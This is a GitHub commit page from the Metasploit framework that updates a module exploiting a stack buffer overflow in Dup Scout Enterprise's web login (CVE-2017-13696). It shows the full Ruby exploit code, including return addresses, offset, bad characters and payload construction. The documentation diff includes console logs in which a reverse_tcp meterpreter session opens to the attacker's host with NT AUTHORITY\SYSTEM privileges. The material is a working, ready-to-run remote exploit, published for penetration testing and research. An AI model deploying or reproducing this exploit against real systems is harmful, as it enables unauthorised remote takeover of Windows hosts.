Skip to content

Commit

Permalink
dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting
Browse files Browse the repository at this point in the history
  • Loading branch information
@bcoles
bcoles committed Feb 25, 2021
1 parent ecab3f6 commit f89d67d
Show file tree
Hide file tree
Showing 2 changed files with 185 additions and 96 deletions.
89 changes: 57 additions & 32 deletions documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
View file
Original file line number Diff line number Diff line change
@@ -1,47 +1,72 @@
## Vulnerable Application

Tested on Windows 10 x64
This module exploits a stack buffer overflow in Dup Scout Enterprise
versions <= 10.0.18. The buffer overflow exists via the web interface
during login. This gives NT AUTHORITY\SYSTEM access.

Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
This module has been tested successfully on Dup Scout Enterprise
versions:

[Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
* 9.9.14 on Windows 7 SP1 (x64)
* 9.9.14 on Windows XP SP0 (x64)
* 10.0.18 on Windows 7 SP1 (x64)
* 10.0.18 on Windows XP SP0 (x86)
* 10.0.18 on Windows 10 (1909) (x64)

## Verification Steps

1. Install the application and set the option above to enable the web server
2. Start msfconsole
3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof```
5. Set options and payload
6. Do: ```run```
7. You should get a shell.
Download:

## Options
* [Dup Scout Enterprise v9.9.14](https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe)
* [Dup Scout Enterprise v10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)

**RHOST**
Install the application from the link above and enable the web server by going to
Tools -> Advanced Options -> Server -> Enable Web Server on Port.

IP address of the remote host running the server.
Metasploit:

**RPORT**
1. Install the application and set the option above to enable the web server
1. Start msfconsole
1. Do: `use exploit/windows/http/dup_scout_enterprise_login_bof`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. You should get a shell.

Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options.
## Options

## Scenarios

To obtain a shell:

```
msf > use exploit/windows/http/dup_scout_enterprise_login_bof
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
rhost => 192.168.1.171
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
lhost => 192.168.1.252
msf exploit(windows/http/dup_scout_enterprise_login_bof) > run
[*] Started reverse TCP handler on 192.168.1.252:4444
[*] Generating exploit...
[*] Triggering the exploit now...
[*] Sending stage (179779 bytes) to 192.168.1.171
[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
```
### Dup Scout Enterprise version 10.0.18 (x86) on Windows 10 (1909) (x64)

```
msf6 > use exploit/windows/http/dup_scout_enterprise_login_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set rhosts 172.16.191.199
rhosts => 172.16.191.199
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 172.16.191.192
lhost => 172.16.191.192
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run
[*] Started reverse TCP handler on 172.16.191.192:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 10.0.18.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise 10.0.18 (x86)
[*] Generating payload ...
[*] Sending payload (10000 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.199
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:50196) at 2021-02-22 21:14:52 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-6VPIDIM
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 17
Meterpreter : x86/windows
meterpreter >
```

192 changes: 128 additions & 64 deletions modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,99 +4,163 @@
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(update_info(info,
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Dup Scout Enterprise
10.0.18. The buffer overflow exists via the web interface during
login. This gives NT AUTHORITY\SYSTEM access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'sickness' # Original discovery
],
'References' =>
[
[ 'CVE', '2017-13696' ],
[ 'EDB', '43145' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
super(
update_info(
info,
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Dup Scout Enterprise
versions <= 10.0.18. The buffer overflow exists via the web interface
during login. This gives NT AUTHORITY\SYSTEM access.
This module has been tested successfully on Dup Scout Enterprise
versions:
9.9.14 on Windows 7 SP1 (x64);
9.9.14 on Windows XP SP0 (x64);
10.0.18 on Windows 7 SP1 (x64);
10.0.18 on Windows XP SP0 (x86); and
10.0.18 on Windows 10 (1909) (x64).
},
'Platform' => 'win',
'Payload' =>
'License' => MSF_LICENSE,
'Author' =>
[
'sickness', # Original discovery and exploit
'Chris Higgins', # msf Module -- @ch1gg1ns
'bcoles', # Automatic targetting and v9.9.14 target
],
'References' =>
[
['CVE', '2017-13696'],
['CWE', '121'],
['EDB', '42557'],
['EDB', '43145'],
['EDB', '40832']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
},
'Targets' =>
[
[ 'Automatic', { 'auto' => true } ],
[
'Dup Scout Enterprise 9.9.14 (x86)',
{
# 0x100b5612 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
'Version' => '9.9.14',
'Ret' => 0x100b5612,
'Offset' => 780
}
],
[
'Dup Scout Enterprise 10.0.18 (x86)',
{
# 0x10090c83 : jmp esp | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
'Version' => '10.0.18',
'Ret' => 0x10090c83,
'Offset' => 780
}
],
],
'Notes' =>
{
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
'Stability' => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
},
'Targets' =>
[
[ 'Dup Scout Enterprise 10.0.18',
{
'Ret' => 0x10090c83, # jmp esp - libspp.dll
'Offset' => 780
}
],
],
'Privileged' => true,
'DisclosureDate' => '2017-11-14',
'DefaultTarget' => 0))
'Privileged' => true,
'DisclosureDate' => '2017-11-14',
'DefaultTarget' => 0
)
)

register_options([Opt::RPORT(80)])

end

def check
res = send_request_cgi({
'uri' => '/',
'uri' => '/',
'method' => 'GET'
})

unless res
return CheckCode::Unknown('Connection failed.')
end

version = res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first

unless version
return CheckCode::Safe('Target is not Dup Scout Enterprise.')
end

unless target_for_version(version)
return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")
end

CheckCode::Appears("Dup Scout Enterprise version #{version}.")
end

def dup_version
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})

if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
return Exploit::CheckCode::Appears
unless res
return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')
end

return Exploit::CheckCode::Safe
res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
end

def target_for_version(version)
return unless version
targets.select { |t| version == t['Version'] }.first
end

def exploit
connect
my_target = target

if target.name == 'Automatic'
print_status('Selecting a target...')
my_target = target_for_version(dup_version)
unless my_target
fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
end
end

print_status("Using target: #{my_target.name}")

print_status("Generating exploit...")
print_status('Generating payload ...')

evil = rand_text(target['Offset'])
evil << [target.ret].pack('V')
evil = rand_text(my_target['Offset'])
evil << [my_target.ret].pack('V')
evil << make_nops(12)
evil << payload.encoded
evil << make_nops(10000 - evil.length)

vprint_status("Evil length: " + evil.length.to_s)

sploit = "username="
sploit << evil
sploit << "&password="
sploit << rand_text(evil.length)
sploit << "\r\n"
evil << make_nops(10_000 - evil.length)

print_status("Triggering the exploit now...")
print_status("Sending payload (#{evil.length} bytes) ...")

res = send_request_cgi({
send_request_cgi({
'uri' => '/login',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'content-length' => '17000',
'data' => sploit
'vars_post' => {
'username' => evil,
'password' => rand_text(10..20)
}
})

handler
disconnect

end
end

0 comments on commit f89d67d

Please sign in to comment.